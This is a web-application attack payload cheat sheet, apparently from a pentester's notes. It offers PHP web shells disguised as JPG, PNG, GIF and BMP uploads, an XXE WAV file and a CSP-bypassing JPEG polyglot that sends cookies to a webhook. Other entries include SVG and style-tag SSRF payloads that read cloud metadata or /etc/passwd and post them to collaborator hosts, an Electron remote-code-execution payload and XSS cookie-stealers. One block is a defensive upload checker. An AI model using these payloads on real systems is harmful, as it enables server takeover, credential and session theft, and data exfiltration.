# Payloads

## File Upload

{% code overflow="wrap" %}

```bash
# JPG
echo -n -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]);?>.' > shell.jpg
# PNG
echo -n -e '\x89\x50\x4E\x47<?php system($_GET["cmd"]);?>.' > shell.png
# GIF
echo -n -e '\x47\x49\x46\x38<?php system($_GET["cmd"]);?>.' > shell.gif
# BMP
echo -n -e '\x42\x4D<?php system($_GET["cmd"]);?>.' > shell.bmp
# WAV (XXE)
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00YOUR_XML_PAYLOAD_HERE\x00' > payload.wav
```

{% endcode %}
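The image payloads above are built to pass an upload filter that only compares the first two to four bytes. As an added example (not from the original page), this Python helper checks the full signature for each format, a few structural markers the crafted files lack, and scans for embedded PHP or script tags; the signature table and the sample bytes in `SAMPLES` are constructed for this example.

```python
import re

# Full signatures; the crafted uploads only reproduce the first 2-4 bytes of these.
SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": (b"GIF87a", b"GIF89a"),
    "jpg": b"\xff\xd8\xff",
    "bmp": b"BM",
}
# Server-side tags and markup that have no business inside a raster image.
ACTIVE_CONTENT = re.compile(rb"<\?(php|=)|<script|<svg|<esi:", re.IGNORECASE)


def inspect_upload(data: bytes, ext: str) -> list[str]:
    """Return a list of findings; an empty list means the file looks clean."""
    ext = ext.lower()
    sig = SIGNATURES.get(ext)
    if sig is None:
        return ["extension not in allow-list"]
    findings = []
    if not data.startswith(sig):  # startswith accepts a tuple of prefixes
        findings.append("magic bytes do not match extension")
    # Cheap structural checks: trailers and declared sizes the payloads omit.
    if ext == "jpg" and not data.endswith(b"\xff\xd9"):
        findings.append("JPEG missing EOI marker")
    if ext == "gif" and not data.endswith(b";"):
        findings.append("GIF missing trailer")
    if ext == "bmp" and (len(data) < 14 or int.from_bytes(data[2:6], "little") != len(data)):
        findings.append("BMP header size does not match file length")
    if ext == "png" and (len(data) < 16 or data[12:16] != b"IHDR"):
        findings.append("PNG missing IHDR chunk")
    m = ACTIVE_CONTENT.search(data)
    if m:
        findings.append(f"embedded active content at offset {m.start()}: {m.group(0)!r}")
    return findings


# Constructed samples: a harmless PHP tag after a truncated signature, and a
# structurally minimal 1x1 PNG (signature, IHDR, IEND) with no payload.
SAMPLES = {
    "jpg": b"\xff\xd8\xff\xe0<?php echo 1; ?>.",
    "png": b"\x89PNG<?php echo 1; ?>.",
    "good_png": (b"\x89PNG\r\n\x1a\n\x00\x00\x00\x0dIHDR"
                 b"\x00\x00\x00\x01\x00\x00\x00\x01\x08\x06\x00\x00\x00\x1f\x15\xc4\x89"
                 b"\x00\x00\x00\x00IEND\xaeB`\x82"),
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print(name, inspect_upload(blob, name.split("_")[-1]))
```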

### Bypass CSP Polyglot JPEG

Payload to embed in the picture with the HxD hex editor (use this [POC](http://portswigger-labs.net/polyglot/jpeg/xss.jpg))

```javascript
document.location='<WEBHOOK>/zeyad?c='+encodeURIComponent(btoa(document.cookie));
```

HTML that loads the polyglot image as a script:

```html
<script charset="ISO-8859-1" src="http://portswigger-labs.net/polyglot/jpeg/xss.jpg"></script>
```

Research link: <https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs>

## Server Side Request Forgery

### SVG

{% code overflow="wrap" %}

```svg
<svg width="100%" height="100%" viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><image xlink:href="https://google.com/favicon.ico" height="20" width="20" onload="fetch('http://169.254.169.254/latest/meta-data/hostname').then(function (response) {response.text().then(function(text) {var params = text;var http = new XMLHttpRequest();var url = 'https://<>.burpcollaborator.net/';http.open('POST', url, true);http.send(params);})});" /></svg>
```

{% endcode %}

### Meta Tags

```html
<meta http-equiv="refresh" content="0;url=http://169.254.169.254" />
```

### Style tags

{% code overflow="wrap" %}

```html
<style><h1>h1taginjection</h1><iframe xmlns="http://www.w3.org/1999/xhtml" src="file:///etc/passwd" width="800" height="850"/>
    @import url(http://ta79rlzq77p2kdoak91nqryxlorff4.burpcollaborator.net/import.css);</style>
```

{% endcode %}

### HTTP Redirect

```php
# ?url=http://your-domain/r.php
# [ r.php ]
<?php
header('Location: http://127.0.0.1:8080/server-status');
?>
```

### Edge Side Include

```xml
<esi:include src=http://127.0.0.1/server-status/>
<esi:include src=http://internal_domain/server_base_csrf_page/>
```

## Electron RCE

```html
<head>
        <meta property="og:description" content="<img src=x onerror=&quot;top.require('child_process').execSync('wget https://1a6c-37-36-116-188.eu.ngrok.io')&quot;>">
</head>
```

### More

* <https://www.hahwul.com/phoenix/ssrf-open-redirect/>
* <https://github.com/cujanovic/SSRF-Testing>

## XSS

### Markdown

```markdown
![<img src="#" onerror="src='http://requestbin.net/r/12bfihl1?c='+document.cookie; this.onerror=null"/>](#){onerror=outerHTML=alt}
```

### Payload in hashstring

```html
"<iframe/onload=eval(atob(location.hash.substring(1)))>"@calc.sh
```
